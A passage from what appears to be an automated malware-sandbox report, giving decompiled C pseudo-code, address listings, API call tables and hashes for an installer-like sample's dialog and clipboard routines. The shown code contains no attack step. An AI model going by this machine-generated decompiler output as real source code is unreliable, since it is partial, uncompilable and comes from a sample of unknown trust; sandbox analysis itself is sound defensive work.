                                                        				if(( *0x42f43c & 0x00000004) != 0) {
                                                        					SendMessageA(_t161, 0x409, _t150, _a8);
                                                        					SendMessageA(_t161, 0x2001, _t150, _a12);
                                                        				}
                                                        				goto L36;
                                                        			}





































                                                        0x00405362
                                                        0x0040536a
                                                        0x0040536d
                                                        0x00405375
                                                        0x00405378
                                                        0x00405507
                                                        0x0040550d
                                                        0x0040552a
                                                        0x00405531
                                                        0x00405531
                                                        0x0040553d
                                                        0x00405543
                                                        0x00405565
                                                        0x00405565
                                                        0x0040556b
                                                        0x004055c0
                                                        0x004055c0
                                                        0x004055c3
                                                        0x00000000
                                                        0x00000000
                                                        0x004055c5
                                                        0x004055c8
                                                        0x004055cb
                                                        0x00000000
                                                        0x00000000
                                                        0x004055d5
                                                        0x004055db
                                                        0x004055dd
                                                        0x004055e0
                                                        0x004056dd
                                                        0x00000000
                                                        0x004056dd
                                                        0x004055ef
                                                        0x004055fb
                                                        0x00405604
                                                        0x0040560b
                                                        0x0040560f
                                                        0x00405612
                                                        0x0040561b
                                                        0x00405621
                                                        0x00405624
                                                        0x00405624
                                                        0x00405634
                                                        0x0040563a
                                                        0x0040563d
                                                        0x00405648
                                                        0x00405648
                                                        0x00405649
                                                        0x0040564c
                                                        0x00405653
                                                        0x0040565a
                                                        0x00405662
                                                        0x00405662
                                                        0x00405670
                                                        0x00405676
                                                        0x00405679
                                                        0x00405679
                                                        0x00405680
                                                        0x00405686
                                                        0x0040568f
                                                        0x00405696
                                                        0x0040569f
                                                        0x004056a1
                                                        0x004056a4
                                                        0x004056b3
                                                        0x004056b5
                                                        0x004056b8
                                                        0x004056b9
                                                        0x004056bc
                                                        0x004056bd
                                                        0x004056be
                                                        0x004056be
                                                        0x004056c6
                                                        0x004056d1
                                                        0x004056d7
                                                        0x004056d7
                                                        0x00000000
                                                        0x0040563d
                                                        0x0040556d
                                                        0x00405573
                                                        0x004055a1
                                                        0x004055a3
                                                        0x004055a9
                                                        0x004055ab
                                                        0x004055b4
                                                        0x004055b4
                                                        0x004055bb
                                                        0x00000000
                                                        0x004055bb
                                                        0x00405577
                                                        0x00405581
                                                        0x00000000
                                                        0x00405545
                                                        0x00405545
                                                        0x0040554b
                                                        0x00405586
                                                        0x00000000
                                                        0x0040558d
                                                        0x00405554
                                                        0x0040555b
                                                        0x00405560
                                                        0x00000000
                                                        0x00405560
                                                        0x00405543
                                                        0x0040537e
                                                        0x00405382
                                                        0x0040538a
                                                        0x0040538e
                                                        0x00405391
                                                        0x00405394
                                                        0x00405397
                                                        0x0040539a
                                                        0x0040539b
                                                        0x0040539c
                                                        0x004053b5
                                                        0x004053b8
                                                        0x004053c2
                                                        0x004053d1
                                                        0x004053d9
                                                        0x004053e1
                                                        0x004053e6
                                                        0x004053e9
                                                        0x004053f5
                                                        0x004053fe
                                                        0x00405407
                                                        0x00405429
                                                        0x0040542f
                                                        0x00405440
                                                        0x00405445
                                                        0x00405453
                                                        0x00405461
                                                        0x00405461
                                                        0x00405466
                                                        0x00405474
                                                        0x00405474
                                                        0x00405479
                                                        0x0040547c
                                                        0x00405481
                                                        0x0040548d
                                                        0x00405496
                                                        0x004054a3
                                                        0x004054b2
                                                        0x004054a5
                                                        0x004054aa
                                                        0x004054aa
                                                        0x004054be
                                                        0x004054be
                                                        0x004054d2
                                                        0x004054db
                                                        0x004054e4
                                                        0x004054f4
                                                        0x00405500
                                                        0x00405500
                                                        0x00000000

                                                        APIs
                                                        • GetDlgItem.USER32 ref: 004053BB
                                                        • GetDlgItem.USER32 ref: 004053CA
                                                        • GetClientRect.USER32 ref: 00405407
                                                        • GetSystemMetrics.USER32 ref: 0040540E
                                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
                                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
                                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
                                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
                                                        • ShowWindow.USER32(?,00000008), ref: 004054AA
                                                        • GetDlgItem.USER32 ref: 004054CB
                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
                                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
                                                        • GetDlgItem.USER32 ref: 004053D9
                                                          • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                        • GetDlgItem.USER32 ref: 0040551C
                                                        • CreateThread.KERNELBASE ref: 0040552A
                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405531
                                                        • ShowWindow.USER32(00000000), ref: 00405554
                                                        • ShowWindow.USER32(?,00000008), ref: 0040555B
                                                        • ShowWindow.USER32(00000008), ref: 004055A1
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
                                                        • CreatePopupMenu.USER32 ref: 004055E6
                                                        • AppendMenuA.USER32 ref: 004055FB
                                                        • GetWindowRect.USER32 ref: 0040561B
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
                                                        • OpenClipboard.USER32(00000000), ref: 00405680
                                                        • EmptyClipboard.USER32 ref: 00405686
                                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
                                                        • GlobalLock.KERNEL32 ref: 00405699
                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004056C6
                                                        • SetClipboardData.USER32 ref: 004056D1
                                                        • CloseClipboard.USER32 ref: 004056D7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                        • String ID: Name Setup: Completed
                                                        • API String ID: 4154960007-1721692471
                                                        • Opcode ID: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                        • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                        • Opcode Fuzzy Hash: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                        • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 183 403ca7-403cb9 184 403dfa-403e09 183->184 185 403cbf-403cc5 183->185 187 403e58-403e6d 184->187 188 403e0b-403e46 GetDlgItem * 2 call 40417b KiUserCallbackDispatcher call 40140b 184->188 185->184 186 403ccb-403cd4 185->186 189 403cd6-403ce3 SetWindowPos 186->189 190 403ce9-403cec 186->190 192 403ead-403eb2 call 4041c7 187->192 193 403e6f-403e72 187->193 211 403e4b-403e53 188->211 189->190 197 403d06-403d0c 190->197 198 403cee-403d00 ShowWindow 190->198 202 403eb7-403ed2 192->202 194 403e74-403e7f call 401389 193->194 195 403ea5-403ea7 193->195 194->195 216 403e81-403ea0 SendMessageA 194->216 195->192 201 404148 195->201 203 403d28-403d2b 197->203 204 403d0e-403d23 DestroyWindow 197->204 198->197 209 40414a-404151 201->209 207 403ed4-403ed6 call 40140b 202->207 208 403edb-403ee1 202->208 212 403d2d-403d39 SetWindowLongA 203->212 213 403d3e-403d44 203->213 210 404125-40412b 204->210 207->208 219 404106-40411f DestroyWindow EndDialog 208->219 220 403ee7-403ef2 208->220 210->201 218 40412d-404133 210->218 211->187 212->209 214 403de7-403df5 call 4041e2 213->214 215 403d4a-403d5b GetDlgItem 213->215 214->209 221 403d7a-403d7d 215->221 222 403d5d-403d74 SendMessageA IsWindowEnabled 215->222 216->209 218->201 224 404135-40413e ShowWindow 218->224 219->210 220->219 225 403ef8-403f45 call 40618a call 40417b * 3 GetDlgItem 220->225 226 403d82-403d85 221->226 227 403d7f-403d80 221->227 222->201 222->221 224->201 253 403f47-403f4c 225->253 254 403f4f-403f8b ShowWindow KiUserCallbackDispatcher call 40419d EnableWindow 225->254 231 403d93-403d98 226->231 232 403d87-403d8d 226->232 230 403db0-403db5 call 404154 227->230 230->214 234 403dce-403de1 SendMessageA 231->234 236 403d9a-403da0 231->236 232->234 235 403d8f-403d91 232->235 234->214 235->230 240 403da2-403da8 call 40140b 236->240 241 403db7-403dc0 call 40140b 236->241 251 403dae 240->251 241->214 250 403dc2-403dcc 241->250 250->251 251->230 253->254 257 403f90 254->257 258 403f8d-403f8e 254->258 259 403f92-403fc0 GetSystemMenu EnableMenuItem SendMessageA 257->259 258->259 260 403fc2-403fd3 SendMessageA 259->260 261 403fd5 259->261 262 403fdb-404015 call 4041b0 call 403c88 call 4060f7 lstrlenA call 40618a SetWindowTextA call 401389 260->262 261->262 262->202 273 40401b-40401d 262->273 273->202 274 404023-404027 273->274 275 404046-40405a DestroyWindow 274->275 276 404029-40402f 274->276 275->210 278 404060-40408d CreateDialogParamA 275->278 276->201 277 404035-40403b 276->277 277->202 280 404041 277->280 278->210 279 404093-4040ea call 40417b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 278->279 279->201 285 4040ec-4040ff ShowWindow call 4041c7 279->285 280->201 287 404104 285->287 287->210
                                                        C-Code - Quality: 84%
                                                        			E00403CA7(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                        				struct HWND__* _v32;
                                                        				void* _v84;
                                                        				void* _v88;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t35;
                                                        				signed int _t37;
                                                        				signed int _t39;
                                                        				struct HWND__* _t49;
                                                        				signed int _t68;
                                                        				struct HWND__* _t74;
                                                        				signed int _t87;
                                                        				struct HWND__* _t92;
                                                        				signed int _t100;
                                                        				int _t104;
                                                        				signed int _t116;
                                                        				signed int _t117;
                                                        				int _t118;
                                                        				signed int _t123;
                                                        				struct HWND__* _t126;
                                                        				struct HWND__* _t127;
                                                        				int _t128;
                                                        				long _t131;
                                                        				int _t133;
                                                        				int _t134;
                                                        				void* _t135;
                                                        				void* _t143;
                                                        
                                                        				_t116 = _a8;
                                                        				if(_t116 == 0x110 || _t116 == 0x408) {
                                                        					_t35 = _a12;
                                                        					_t126 = _a4;
                                                        					__eflags = _t116 - 0x110;
                                                        					 *0x42a878 = _t35;
                                                        					if(_t116 == 0x110) {
                                                        						 *0x42f428 = _t126;
                                                        						 *0x42a88c = GetDlgItem(_t126, 1);
                                                        						_t92 = GetDlgItem(_t126, 2);
                                                        						_push(0xffffffff);
                                                        						_push(0x1c);
                                                        						 *0x429858 = _t92;
                                                        						E0040417B(_t126);
                                                        						SetClassLongA(_t126, 0xfffffff2,  *0x42ec08); // executed
                                                        						 *0x42ebec = E0040140B(4);
                                                        						_t35 = 1;
                                                        						__eflags = 1;
                                                        						 *0x42a878 = 1;
                                                        					}
                                                        					_t123 =  *0x40a1dc; // 0x2
                                                        					_t134 = 0;
                                                        					_t131 = (_t123 << 6) +  *0x42f460;
                                                        					__eflags = _t123;
                                                        					if(_t123 < 0) {
                                                        						L34:
                                                        						E004041C7(0x40b);
                                                        						while(1) {
                                                        							_t37 =  *0x42a878; // 0x1
                                                        							 *0x40a1dc =  *0x40a1dc + _t37;
                                                        							_t131 = _t131 + (_t37 << 6);
                                                        							_t39 =  *0x40a1dc; // 0x2
                                                        							__eflags = _t39 -  *0x42f464;
                                                        							if(_t39 ==  *0x42f464) {
                                                        								E0040140B(1);
                                                        							}
                                                        							__eflags =  *0x42ebec - _t134; // 0x0
                                                        							if(__eflags != 0) {
                                                        								break;
                                                        							}
                                                        							__eflags =  *0x40a1dc -  *0x42f464; // 0x2
                                                        							if(__eflags >= 0) {
                                                        								break;
                                                        							}
                                                        							_t117 =  *(_t131 + 0x14);
                                                        							E0040618A(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
                                                        							_push( *((intOrPtr*)(_t131 + 0x20)));
                                                        							_push(0xfffffc19);
                                                        							E0040417B(_t126);
                                                        							_push( *((intOrPtr*)(_t131 + 0x1c)));
                                                        							_push(0xfffffc1b);
                                                        							E0040417B(_t126);
                                                        							_push( *((intOrPtr*)(_t131 + 0x28)));
                                                        							_push(0xfffffc1a);
                                                        							E0040417B(_t126);
                                                        							_t49 = GetDlgItem(_t126, 3);
                                                        							__eflags =  *0x42f4cc - _t134;
                                                        							_v32 = _t49;
                                                        							if( *0x42f4cc != _t134) {
                                                        								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                        								__eflags = _t117;
                                                        							}
                                                        							ShowWindow(_t49, _t117 & 0x00000008); // executed
                                                        							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100); // executed
                                                        							E0040419D(_t117 & 0x00000002);
                                                        							_t118 = _t117 & 0x00000004;
                                                        							EnableWindow( *0x429858, _t118);
                                                        							__eflags = _t118 - _t134;
                                                        							if(_t118 == _t134) {
                                                        								_push(1);
                                                        							} else {
                                                        								_push(_t134);
                                                        							}
                                                        							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
                                                        							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
                                                        							__eflags =  *0x42f4cc - _t134;
                                                        							if( *0x42f4cc == _t134) {
                                                        								_push( *0x42a88c);
                                                        							} else {
                                                        								SendMessageA(_t126, 0x401, 2, _t134);
                                                        								_push( *0x429858);
                                                        							}
                                                        							E004041B0();
                                                        							E004060F7(0x42a890, E00403C88());
                                                        							E0040618A(0x42a890, _t126, _t131,  &(0x42a890[lstrlenA(0x42a890)]),  *((intOrPtr*)(_t131 + 0x18)));
                                                        							SetWindowTextA(_t126, 0x42a890); // executed
                                                        							_push(_t134);
                                                        							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
                                                        							__eflags = _t68;
                                                        							if(_t68 != 0) {
                                                        								continue;
                                                        							} else {
                                                        								__eflags =  *_t131 - _t134;
                                                        								if( *_t131 == _t134) {
                                                        									continue;
                                                        								}
                                                        								__eflags =  *(_t131 + 4) - 5;
                                                        								if( *(_t131 + 4) != 5) {
                                                        									DestroyWindow( *0x42ebf8); // executed
                                                        									 *0x42a068 = _t131;
                                                        									__eflags =  *_t131 - _t134;
                                                        									if( *_t131 <= _t134) {
                                                        										goto L58;
                                                        									}
                                                        									_t74 = CreateDialogParamA( *0x42f420,  *_t131 +  *0x42ec00 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131); // executed
                                                        									__eflags = _t74 - _t134;
                                                        									 *0x42ebf8 = _t74;
                                                        									if(_t74 == _t134) {
                                                        										goto L58;
                                                        									}
                                                        									_push( *((intOrPtr*)(_t131 + 0x2c)));
                                                        									_push(6);
                                                        									E0040417B(_t74);
                                                        									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
                                                        									ScreenToClient(_t126, _t135 + 0x10);
                                                        									SetWindowPos( *0x42ebf8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
                                                        									_push(_t134);
                                                        									E00401389( *((intOrPtr*)(_t131 + 0xc)));
                                                        									__eflags =  *0x42ebec - _t134; // 0x0
                                                        									if(__eflags != 0) {
                                                        										goto L61;
                                                        									}
                                                        									ShowWindow( *0x42ebf8, 8); // executed
                                                        									E004041C7(0x405);
                                                        									goto L58;
                                                        								}
                                                        								__eflags =  *0x42f4cc - _t134;
                                                        								if( *0x42f4cc != _t134) {
                                                        									goto L61;
                                                        								}
                                                        								__eflags =  *0x42f4c0 - _t134;
                                                        								if( *0x42f4c0 != _t134) {
                                                        									continue;
                                                        								}
                                                        								goto L61;
                                                        							}
                                                        						}
                                                        						DestroyWindow( *0x42ebf8); // executed
                                                        						 *0x42f428 = _t134;
                                                        						EndDialog(_t126,  *0x429c60); // executed
                                                        						goto L58;
                                                        					} else {
                                                        						__eflags = _t35 - 1;
                                                        						if(_t35 != 1) {
                                                        							L33:
                                                        							__eflags =  *_t131 - _t134;
                                                        							if( *_t131 == _t134) {
                                                        								goto L61;
                                                        							}
                                                        							goto L34;
                                                        						}
                                                        						_push(0);
                                                        						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
                                                        						__eflags = _t87;
                                                        						if(_t87 == 0) {
                                                        							goto L33;
                                                        						}
                                                        						SendMessageA( *0x42ebf8, 0x40f, 0, 1);
                                                        						__eflags =  *0x42ebec - _t134; // 0x0
                                                        						return 0 | __eflags == 0x00000000;
                                                        					}
                                                        				} else {
                                                        					_t126 = _a4;
                                                        					_t134 = 0;
                                                        					if(_t116 == 0x47) {
                                                        						SetWindowPos( *0x42a870, _t126, 0, 0, 0, 0, 0x13);
                                                        					}
                                                        					if(_t116 == 5) {
                                                        						asm("sbb eax, eax");
                                                        						ShowWindow( *0x42a870,  ~(_a12 - 1) & _t116);
                                                        					}
                                                        					if(_t116 != 0x40d) {
                                                        						__eflags = _t116 - 0x11;
                                                        						if(_t116 != 0x11) {
                                                        							__eflags = _t116 - 0x111;
                                                        							if(_t116 != 0x111) {
                                                        								L26:
                                                        								return E004041E2(_t116, _a12, _a16);
                                                        							}
                                                        							_t133 = _a12 & 0x0000ffff;
                                                        							_t127 = GetDlgItem(_t126, _t133);
                                                        							__eflags = _t127 - _t134;
                                                        							if(_t127 == _t134) {
                                                        								L13:
                                                        								__eflags = _t133 - 1;
                                                        								if(_t133 != 1) {
                                                        									__eflags = _t133 - 3;
                                                        									if(_t133 != 3) {
                                                        										_t128 = 2;
                                                        										__eflags = _t133 - _t128;
                                                        										if(_t133 != _t128) {
                                                        											L25:
                                                        											SendMessageA( *0x42ebf8, 0x111, _a12, _a16);
                                                        											goto L26;
                                                        										}
                                                        										__eflags =  *0x42f4cc - _t134;
                                                        										if( *0x42f4cc == _t134) {
                                                        											_t100 = E0040140B(3);
                                                        											__eflags = _t100;
                                                        											if(_t100 != 0) {
                                                        												goto L26;
                                                        											}
                                                        											 *0x429c60 = 1;
                                                        											L21:
                                                        											_push(0x78);
                                                        											L22:
                                                        											E00404154();
                                                        											goto L26;
                                                        										}
                                                        										E0040140B(_t128);
                                                        										 *0x429c60 = _t128;
                                                        										goto L21;
                                                        									}
                                                        									__eflags =  *0x40a1dc - _t134; // 0x2
                                                        									if(__eflags <= 0) {
                                                        										goto L25;
                                                        									}
                                                        									_push(0xffffffff);
                                                        									goto L22;
                                                        								}
                                                        								_push(_t133);
                                                        								goto L22;
                                                        							}
                                                        							SendMessageA(_t127, 0xf3, _t134, _t134);
                                                        							_t104 = IsWindowEnabled(_t127);
                                                        							__eflags = _t104;
                                                        							if(_t104 == 0) {
                                                        								goto L61;
                                                        							}
                                                        							goto L13;
                                                        						}
                                                        						SetWindowLongA(_t126, _t134, _t134);
                                                        						return 1;
                                                        					} else {
                                                        						DestroyWindow( *0x42ebf8);
                                                        						 *0x42ebf8 = _a12;
                                                        						L58:
                                                        						if( *0x42b890 == _t134) {
                                                        							_t143 =  *0x42ebf8 - _t134; // 0x30290
                                                        							if(_t143 != 0) {
                                                        								ShowWindow(_t126, 0xa); // executed
                                                        								 *0x42b890 = 1;
                                                        							}
                                                        						}
                                                        						L61:
                                                        						return 0;
                                                        					}
                                                        				}
                                                        			}































                                                        0x00403cb0
                                                        0x00403cb9
                                                        0x00403dfa
                                                        0x00403dfe
                                                        0x00403e02
                                                        0x00403e04
                                                        0x00403e09
                                                        0x00403e14
                                                        0x00403e1f
                                                        0x00403e24
                                                        0x00403e26
                                                        0x00403e28
                                                        0x00403e2b
                                                        0x00403e30
                                                        0x00403e3e
                                                        0x00403e4b
                                                        0x00403e52
                                                        0x00403e52
                                                        0x00403e53
                                                        0x00403e53
                                                        0x00403e58
                                                        0x00403e5e
                                                        0x00403e65
                                                        0x00403e6b
                                                        0x00403e6d
                                                        0x00403ead
                                                        0x00403eb2
                                                        0x00403eb7
                                                        0x00403eb7
                                                        0x00403ebc
                                                        0x00403ec5
                                                        0x00403ec7
                                                        0x00403ecc
                                                        0x00403ed2
                                                        0x00403ed6
                                                        0x00403ed6
                                                        0x00403edb
                                                        0x00403ee1
                                                        0x00000000
                                                        0x00000000
                                                        0x00403eec
                                                        0x00403ef2
                                                        0x00000000
                                                        0x00000000
                                                        0x00403efb
                                                        0x00403f03
                                                        0x00403f08
                                                        0x00403f0b
                                                        0x00403f11
                                                        0x00403f16
                                                        0x00403f19
                                                        0x00403f1f
                                                        0x00403f24
                                                        0x00403f27
                                                        0x00403f2d
                                                        0x00403f35
                                                        0x00403f3b
                                                        0x00403f41
                                                        0x00403f45
                                                        0x00403f4c
                                                        0x00403f4c
                                                        0x00403f4c
                                                        0x00403f56
                                                        0x00403f68
                                                        0x00403f74
                                                        0x00403f79
                                                        0x00403f83
                                                        0x00403f89
                                                        0x00403f8b
                                                        0x00403f90
                                                        0x00403f8d
                                                        0x00403f8d
                                                        0x00403f8d
                                                        0x00403fa0
                                                        0x00403fb8
                                                        0x00403fba
                                                        0x00403fc0
                                                        0x00403fd5
                                                        0x00403fc2
                                                        0x00403fcb
                                                        0x00403fcd
                                                        0x00403fcd
                                                        0x00403fdb
                                                        0x00403fec
                                                        0x00403ffd
                                                        0x00404004
                                                        0x0040400a
                                                        0x0040400e
                                                        0x00404013
                                                        0x00404015
                                                        0x00000000
                                                        0x0040401b
                                                        0x0040401b
                                                        0x0040401d
                                                        0x00000000
                                                        0x00000000
                                                        0x00404023
                                                        0x00404027
                                                        0x0040404c
                                                        0x00404052
                                                        0x00404058
                                                        0x0040405a
                                                        0x00000000
                                                        0x00000000
                                                        0x00404080
                                                        0x00404086
                                                        0x00404088
                                                        0x0040408d
                                                        0x00000000
                                                        0x00000000
                                                        0x00404093
                                                        0x00404096
                                                        0x00404099
                                                        0x004040b0
                                                        0x004040bc
                                                        0x004040d5
                                                        0x004040db
                                                        0x004040df
                                                        0x004040e4
                                                        0x004040ea
                                                        0x00000000
                                                        0x00000000
                                                        0x004040f4
                                                        0x004040ff
                                                        0x00000000
                                                        0x004040ff
                                                        0x00404029
                                                        0x0040402f
                                                        0x00000000
                                                        0x00000000
                                                        0x00404035
                                                        0x0040403b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00404041
                                                        0x00404015
                                                        0x0040410c
                                                        0x00404118
                                                        0x0040411f
                                                        0x00000000
                                                        0x00403e6f
                                                        0x00403e6f
                                                        0x00403e72
                                                        0x00403ea5
                                                        0x00403ea5
                                                        0x00403ea7
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403ea7
                                                        0x00403e74
                                                        0x00403e78
                                                        0x00403e7d
                                                        0x00403e7f
                                                        0x00000000
                                                        0x00000000
                                                        0x00403e8f
                                                        0x00403e97
                                                        0x00000000
                                                        0x00403e9d
                                                        0x00403ccb
                                                        0x00403ccb
                                                        0x00403ccf
                                                        0x00403cd4
                                                        0x00403ce3
                                                        0x00403ce3
                                                        0x00403cec
                                                        0x00403cf5
                                                        0x00403d00
                                                        0x00403d00
                                                        0x00403d0c
                                                        0x00403d28
                                                        0x00403d2b
                                                        0x00403d3e
                                                        0x00403d44
                                                        0x00403de7
                                                        0x00000000
                                                        0x00403df0
                                                        0x00403d4a
                                                        0x00403d57
                                                        0x00403d59
                                                        0x00403d5b
                                                        0x00403d7a
                                                        0x00403d7a
                                                        0x00403d7d
                                                        0x00403d82
                                                        0x00403d85
                                                        0x00403d95
                                                        0x00403d96
                                                        0x00403d98
                                                        0x00403dce
                                                        0x00403de1
                                                        0x00000000
                                                        0x00403de1
                                                        0x00403d9a
                                                        0x00403da0
                                                        0x00403db9
                                                        0x00403dbe
                                                        0x00403dc0
                                                        0x00000000
                                                        0x00000000
                                                        0x00403dc2
                                                        0x00403dae
                                                        0x00403dae
                                                        0x00403db0
                                                        0x00403db0
                                                        0x00000000
                                                        0x00403db0
                                                        0x00403da3
                                                        0x00403da8
                                                        0x00000000
                                                        0x00403da8
                                                        0x00403d87
                                                        0x00403d8d
                                                        0x00000000
                                                        0x00000000
                                                        0x00403d8f
                                                        0x00000000
                                                        0x00403d8f
                                                        0x00403d7f
                                                        0x00000000
                                                        0x00403d7f
                                                        0x00403d65
                                                        0x00403d6c
                                                        0x00403d72
                                                        0x00403d74
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403d74
                                                        0x00403d30
                                                        0x00000000
                                                        0x00403d0e
                                                        0x00403d14
                                                        0x00403d1e
                                                        0x00404125
                                                        0x0040412b
                                                        0x0040412d
                                                        0x00404133
                                                        0x00404138
                                                        0x0040413e
                                                        0x0040413e
                                                        0x00404133
                                                        0x00404148
                                                        0x00000000
                                                        0x00404148
                                                        0x00403d0c

                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                        • ShowWindow.USER32(?), ref: 00403D00
                                                        • DestroyWindow.USER32 ref: 00403D14
                                                        • SetWindowLongA.USER32 ref: 00403D30
                                                        • GetDlgItem.USER32 ref: 00403D51
                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
                                                        • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                        • GetDlgItem.USER32 ref: 00403E1A
                                                        • GetDlgItem.USER32 ref: 00403E24
                                                        • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403E3E
                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E8F
                                                        • GetDlgItem.USER32 ref: 00403F35
                                                        • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F68
                                                        • EnableWindow.USER32(?,?), ref: 00403F83
                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                                                        • EnableMenuItem.USER32 ref: 00403FA0
                                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB8
                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
                                                        • lstrlenA.KERNEL32(Name Setup: Completed,?,Name Setup: Completed,00000000), ref: 00403FF5
                                                        • SetWindowTextA.USER32(?,Name Setup: Completed), ref: 00404004
                                                        • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                                        • String ID: Name Setup: Completed
                                                        • API String ID: 3906175533-1721692471
                                                        • Opcode ID: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                        • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                        • Opcode Fuzzy Hash: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                        • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
